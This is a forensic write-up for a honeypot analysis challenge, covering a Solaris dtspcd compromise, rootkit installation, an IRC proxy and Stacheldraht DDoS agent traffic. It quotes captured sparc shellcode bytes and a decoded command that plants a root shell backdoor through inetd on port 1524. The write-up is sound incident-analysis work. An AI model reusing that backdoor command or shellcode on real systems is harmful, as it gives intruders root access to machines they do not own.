Scan of the Month

Scan 28
Submission by Leon Ward (nard)
nard@nardware.co.uk http://www.nardware.co.uk

Contents
        Summary
        Questions
            What is the operating system of the honeypot? How did you determine that? (see day1)
            How did the attacker(s) break into the system? (see day1)
            Which systems were used in this attack, and how? (see day1)
            Create a diagram that demonstrates the sequences involved in the attack. (see day1)
            What is the purpose/reason of the ICMP packets with 'skillz' in them? (see day1)
            Following the attack, the attacker(s) enabled a unique protocol that one would not expect to find on a n IPv4 network. Can you identify that protocol and why it was used?
            Can you identify the nationality of the attacker? (see day3)
Links and further reading

Summary:

On the 29th November A SunOS 8.8 honeypot was attacked.
The attacker found a known vulnerability in dtspcd and used widely available exploit. After they gained a root shell (interactive access with root privileges) he configured both as an IRC proxy for him and his friends, and as an agent in a complex DDoS network.

The attacker, presumably Italian using interbusiness.it as their ISP (part of telecom Italia) then actively used the machine both to mask his identity on IRC (a chat network) and to attack another host, javairc.tiscali.it (a chat server for the Tiscali ISP).

For more information about how the attack progressed view this series of diagrams / data captures.

Q1, What is the operating system of the honeypot? How did you determine that? (see day1)

From the log files supplied for review, a safe deduction can be made that the honeypot is a SunOS running on a sparc box. Many things point to this OS / Architecture, including the following.

Passive OS fingerprinting recognises the host as
192.168.100.28 [1 hops]: SunOS 5.8
The NOOP slide leading to the exploit code uses a sparc NOOP instruction

[**] SHELLCODE sparc NOOP [**]
11/29-16:36:26.503382 0:7:EC:B2:D0:A -> 8:0:20:D1:76:19 type:0x800 len:0x5EA
61.219.90.180:56711 -> 192.168.100.28:6112 TCP TTL:44 TOS:0x0 ID:61373 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x7FC1DB88 Ack: 0xBA41EB06 Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 48510034 113867474
30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30 0000000204103e00
30 33 20 20 34 20 00 00 00 31 30 00 80 1C 40 11 03 4 ...10...@.
80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11 ..@.......@...@.
80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11 ..@...@...@...@.

The first command executed by the exploit included a name -a, showing the OS version

# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773

On day 3 the attacker rebooted the box, this is probably to enable IPv6 support, the following syslog entry is captured

<6>Dec 1 17:1 1:55 root nex: [ID 466748 kern.info] root nexus = Sun Ultra 5/10 UPA PCI (Ultra SPARC-IIi 360MHz)

The rootkit included tools for automatically patching known vulnerable daemons, and locked the box down further to prevent attacks. The patches used were for SunOS, in fact the rootkit install script even included the following lines.

echo "${WHI}*${DWHI} ${RED} Oops.. im DUMB! i tried installing SunOS Rootkit on $OS :P"

# Ok.. so if theyre not lame, and running this on SunOS like they should...

2 How did the attacker(s) break into the system? (see day1)

The attacker can be seen connecting to the vulnerable dtspcd daemon in frame 576. The actual exploit code can be seen in frame 580

0530 ff ec 82 10 20 0b 91 d0 20 08 2f 62 69 6e 2f 6b .... ... ./bin/k
0540 73 68 20 20 20 20 2d 63 20 20 65 63 68 6f 20 22 sh -c echo "
0550 69 6e 67 72 65 73 6c 6f 63 6b 20 73 74 72 65 61 ingreslo ck strea
0560 6d 20 74 63 70 20 6e 6f 77 61 69 74 20 72 6f 6f m tcp no wait roo
0570 74 20 2f 62 69 6e 2f 73 68 20 73 68 20 2d 69 22 t /bin/s h sh -i"
0580 3e 2f 74 6d 70 2f 78 3b 2f 75 73 72 2f 73 62 69 >/tmp/x; /usr/sbi
0590 6e 2f 69 6e 65 74 64 20 2d 73 20 2f 74 6d 70 2f n/inetd -s /tmp/
05a0 78 3b 73 6c 65 65 70 20 31 30 3b 2f 62 69 6e 2f x;sleep 10;/bin/
05b0 72 6d 20 2d 66 20 2f 74 6d 70 2f 78 20 41 41 41 rm -f /t mp/x AAA

This code can be cleaned up to be read as...

/bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh-i" > /tmp/x; /usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x

This creates a root shell backdoor on TCP port 1524.
For a list of commands executed refer to the series of diagrams / data captures.

3: Which systems were used in this attack, and how? (see day1)

From the logs given, a safe assumption can be made that the attacker is sitting at a MS Windows XP professional box connected via ADSL to the Italian ISP interbusiness.it. He also has remote shells on numerous linux box's. On the third day the attacker connected again from his XP machine to use the psybnc daemon he installed on day 1. This connection was from another IP in ISP's pool, confirming further the idea of him having an ADSL or account with them.

The first communication shows came from a Linux 2.4.2 machine connected to the hinet.net network. It is most likely that this is another hacked box used to scan and penetrate other hosts.

61.219.90.180 [21 hops away]: Linux 2.4.2 - 2.4.14
The original box that sent exploit to the sun machine, downloaded the rootkit / DDoS client software / PsyBNC / patched the machine ( For commands executed see appendix)

His desktop computer is a Windows XP Pro machine (80.117.14.44 [16 hops away). He uses this box to chat and converse on IRC.
On day 3 (presumably) the same box connected with another IP address (80.117.14.222 [16 hops away]).

Another Linux machine was used to further abuse the honeypot on day3 (1 December) (62.101.108.86 [19 hops away]). It connected to the SSH Backdoor and enabled IPv6 on the box.

4 Create a diagram that demonstrates the sequences involved in the attack. (see day1)

View this series of diagrams / data captures.

5 What is the purpose/reason of the ICMP packets with 'skillz' in them? (see day1)

The attacker installed a DDoS agent on the honeypot. The "skillz" packets (example below) are used to converse with its controlling handler / clients.
The handlers it tries to communicate with are 217.116.38.10 & 61.134.3.11, examples of these can be seen in packets 205 and 206.

620 10065.488930 192.168.100.28 217.116.38.10 ICMP Echo (ping) reply
621 10075.488253 192.168.100.28 61.134.3.11 ICMP Echo (ping) reply

[**] [1:1856:2] DDOS Stacheldraht handler->agent (ficken) [**]
[Classification: Attempted Denial of Service] [Priority: 2]
12/01-20:09:32.623352 0:7:EC:B2:D0:A -> 8:0:20:D1:76:19 type:0x800 len:0x422
61.134.3.11 -> 192.168.100.28 ICMP TTL:237 TOS:0x0 ID:31099 IpLen:20 DgmLen:1044 DF
Type:0 Code:0 ID:6667 Seq:0 ECHO REPLY
[Xref => http://staff.washington.edu/dittrich/misc/stacheldraht.analysis]

[**] [1:1855:2] DDOS Stacheldraht agent->handler (skillz) [**]
[Classification: Attempted Denial of Service] [Priority: 2]
11/29-18:49:50.110576 8:0:20:D1:76:19 -> 0:7:EC:B2:D0:A type:0x800 len:0x422
192.168.100.28 -> 217.116.38.10 ICMP TTL:255 TOS:0x0 ID:35612 IpLen:20 DgmLen:1044 DF
Type:0 Code:0 ID:6666 Seq:0 ECHO REPLY
[Xref => http://staff.washington.edu/dittrich/misc/stacheldraht.analysis]

6 Can you identify the nationality of the attacker? (see day3)

All clues point to the fact the attacker is Italian.

They are using an Italian ISP, interbusiness.it (part of telecom Italia) http://www.191.biz/
They Attacked an Italian IRC Channel http://javairc.tiscali.it ( http://chat.tiscali.it )
They speak Italian.

Appendix, Links and further reading

Ethereal: http://www.ethereal.com
Snort: http://www.snort.org
DDoS analysis http://staff.washington.edu/dittrich/misc/stacheldraht.analysis
nardware.co.uk http://www.nardware.co.uk